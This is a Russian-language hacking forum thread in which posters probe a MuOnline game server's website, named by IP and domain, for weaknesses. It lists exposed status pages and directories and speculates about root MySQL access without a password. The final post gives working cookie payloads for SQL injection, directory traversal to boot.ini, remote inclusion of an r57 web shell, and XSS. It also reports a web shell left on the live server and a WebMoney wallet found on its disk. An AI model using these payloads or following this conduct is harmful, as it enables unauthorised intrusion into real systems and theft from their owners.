|
Уязвимость на сайте
Всем привет! Вот сайт
http://85.115.112.18/ XSpider говорит что там есть SQL Inject! Вот только я его невижу! Ещё там есть http://85.115.112.18/server-status P.S. Не верьте моей репутации! Я на самом деле знаю SQL Injection, PHP Injection читаю статейки по XSS а разные юзвери которые незнают что такое брут ходят с неплохими репутациями! Где справедливость?! :confused: |
Это йгровой сервер игры MuOnline я эго пытался ломануть ничего не вышло вобщем забил на него
|
__tp://85.115.112.18/main_inc/lang.php
__tp://85.115.112.18/server-info |
http://mu.partylife.lv/index.php?pg=adm еще одно раскрытие
|
EST a1ien, тоже MuOnline увлекаешься =) Я просто MuOnline люблю исследовать, потомучто не умею запросами выбивать названия таблиц, а так всё зарание знаю =)
Зкажите почему XSpider выдаёт SQL Inject Я лично его там невижу! Хмм... Интересно... Если вписать %27 то он его не фильтрует, но и нет ошибки =( А если так, фильтрует http://mu.partylife.lv/index.php?pg=lang&lg=ru%27 И раз уж все дружно ищем кривой php =) То вот http://mu.partylife.lv/index.php?pg=lang&lg=ru И естествено http://mu.partylife.lv/index.php?pg=lang&lg=en Ещё кое-что... Не уязвимость, но понятно сколько их там =) Защёл в любую папку! http://mu.partylife.lv/user_images/ Посмотрел HTML <META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://mu.partylife.lv/"> По моему не хватает пару " Ну кто так делает... Что за админ там... У меня ещё вопрос... Можно-ли как-то подконнектиться к ихней MySQL... Судя по сайту у них там скорей всего root без пароля, серверный адресс мы знаем =) Можно попытаться, но только если есть такое чудо, как "Подключение к чужой MySQL" ;) <offtopic> Нда... Может я заслужил свою репутацию -4! Даже тему немогу создать там где надо! Перенесите плиз Форум АНТИЧАТ > ОФФТОП > Болталка > Развлечения > On-line игры и другие. Уязвимости. Коды. </offtopic> Вот ещё немного папок! http://mu.partylife.lv/downloads/ http://mu.partylife.lv/index/ http://mu.partylife.lv/login/ http://mu.partylife.lv/logout/ http://mu.partylife.lv/server-status/ - Интересно... http://mu.partylife.lv/server-info/ - Оч интересно... http://mu.partylife.lv/src/ http://mu.partylife.lv/stats/ http://mu.partylife.lv/video/ http://mu.partylife.lv/includes/ http://mu.partylife.lv/img/ http://mu.partylife.lv/menu/ http://mu.partylife.lv/img/misc/ Многие из них бесполезны! Но меня оч заинтересовало /server-info/ |
Вопервых там стоит винда во вторых MSSQL
а в третьих _http://mu.partylife.lv/index.php?pg=lang&lg=ru здесь нету как я понял запроса к базе а просто идет через case |
О, кстати, я тут собираюсь исходники MuOnline на баги тестить Version=0.97.04 У кого есть какие-либо наработки по этой версии?
|
1ten0.0net1, у меня есть 97 сервак с Castle Siege, Chaos Castle тама все порты переделаны, на нём не идёт Hack Speed, MuPie и много другой читерской фигни! Вот такой вот 97... Жестоко его переделали!
|
2 Ponchik Я этой дрянбю интересуюсь исключительно в технических целях, а не игровых.
|
А вот есть там SQL injection! И еще Directory traversal, File inclusion и Cross Site Scripting. И все это в cookies, в параметре lang и в char. char=' ; lang=../../../../../../../../boot.ini ; lang=http://site.ru/r57.php ; lang=><script>alert(/ok/)</script>. Тут - http://85.115.112.18/inc.php r57shell =)
На диске d:\lol валяется webmoney с паролем. Мой кошелек - Z305549227839 если что8). Shell удалил, так как уже один есть. |
| Время: 20:13 |